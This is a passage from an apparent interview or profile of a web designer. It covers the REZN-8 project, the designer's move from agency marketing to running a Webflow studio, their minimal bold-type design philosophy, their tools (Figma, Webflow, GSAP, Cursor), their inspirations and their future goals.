The biggest challenge, though, was researching and presenting accurate information about the legendary designers featured. Some had very little online presence, so I had to dive deep into design history to get the details right.
Personal notes
REZN-8 holds a special place in my heart. It completely changed how I see layout, grids, and type — it was the project that shifted my design brain forever. Shoutout to Chris Do and TheFutur’s Typography 01 course, which sparked the whole thing.
I didn’t start out as a designer, at least not in the traditional sense. My early work was in a marketing agency where I handled everything from FB ad graphics to SEO landing pages and WordPress articles. It wasn’t glamorous, but it gave me a foundation in how digital systems work.
Then I stumbled across Webflow — and everything changed. I got completely hooked on web design, especially sites with rich motion and interaction.
That moment pushed me to quit the agency world and start my own studio. Since then, I’ve been building expressive, story-driven websites for creatives and design-forward brands, blending design, motion, and development into something that feels personal and intentional.
Design Philosophy
I’ve always leaned toward minimal design paired with bold, heavy type. To me, you don’t need a lot to make something striking, just the right balance of restraint and intention. If the typography is solid and the layout is thoughtful, even the simplest design can carry emotional weight. I focus on clarity, rhythm, and a strong visual pulse — letting motion, space, and type do the heavy lifting.
Tools and Techniques
Figma for most of the design work
Webflow for front-end development and CMS integration
GSAP for all things motion and interaction
Cursor for dev support (because I wouldn’t call myself a “real dev,” but I make it work)
Inspiration
I pull inspiration from a lot of places — music, films, anime — especially the ones that are crafted with insane attention to detail. I’ve always admired how much intention goes into those worlds. There’s so much to steal from them — not just visually, but conceptually and emotionally. I’m also inspired by work that feels personal, raw, and beautifully uncompromising.
Future Goals
My main goal is to keep attracting work that aligns with the way I see and do things. I’m not chasing volume — I just want to keep collaborating with people who value design, story, and craft as much as I do. I’m also interested in exploring more personal projects, maybe even merging design with philosophy, fitness, or writing — things that feel more like extensions of who I am, not just what I do.
Final Thoughts
Learn from the past, embrace the present moment, and look into the future. You only live once, do what makes you happy and what feels right for you.
Contact Info
I’m mostly active on LinkedIn, X (Twitter), and occasionally Instagram.